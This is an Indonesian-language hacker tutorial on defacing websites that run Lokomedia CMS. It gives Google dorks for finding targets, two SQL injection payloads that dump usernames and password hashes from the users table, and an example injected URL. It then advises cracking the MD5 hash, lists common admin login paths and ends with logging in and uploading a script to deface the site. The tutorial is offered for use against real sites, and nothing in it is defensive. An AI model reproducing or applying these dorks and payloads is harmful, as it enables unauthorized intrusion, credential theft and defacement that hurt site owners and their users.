cara deface sqil lokomedia

Rcb blackcyber

hello bos kembali lagi ma gua pendekar hitam
jgn coly mulu ya bos inget umur wkwkwkw dah lah langsung aja 
pd kesempatan kali ini gua mau bagiin Tutorial SQL Injection on Lokomedia CMS .
langsung aja nyimik ya wkwkw

Dork : - inurl:kategori-23-hiburan.html
           - inurl:hal-tentang-kami.html
           - inurl:statis-1-pengantar.html
           - inurl:statis-19-beasiswa.html
           - inurl:statis-22-kerjasama.html

kembangin lagi tuh dork bos biar bisa dapet yg unch

eXploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
 atau ini juga bisa :  union+select+make_set(6,@:=0x0a, (select(1)from(users)where@:=make_set(511,@,0x3C6C6
93E,username,password)),@)--+        

                    tinggal pilih aja ya bos yg lo mau


1. tulis dork di google

2. Pilih web target, Lalu masukan eXploitnya.
di target saya menjadi seperti ini: target.asw/statis--7'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+kantordesa.html


nah klo webnya gini berarti tuh vuln

Sekarang sudah kelihatan user sama passwordnya di bagian title. 
kemudian ctrl+u untuk melihatnya lebih jelas.

kalau user nya gx keliatan biasa lo klik ctrl+ f trus lo tulis Terlihat

 User : admin01dan Pasword : 5a7723dfd981bea76642f0cff273c00f

 , karena password masih dalam bentuk MD5 maka harus di decrypt,

 saya menggunakan HashKiller, 

Kalean bisa gunakan web atau aplikasi laen utk ngeDecrypt MD5 ini.

Untuk login biasanya di :
- www.target.asw/admin
- www.target.asw/adminweb
- www.target.asw/administrator
- www.target.asw/redaktur
klo yg diatas gx bisa lo bisa pake apk admin panel finder  banyak di google
Kali ini loginnya berada di target.asw/adminweb/
, Kemudian masukan user dan pass nya trus tinggal upload aja sc lo di situ
done

                                                                      

Sorry kalo ada perkataan gua yg musingin lo

Karna gua masih noob dan masih kekurangan janda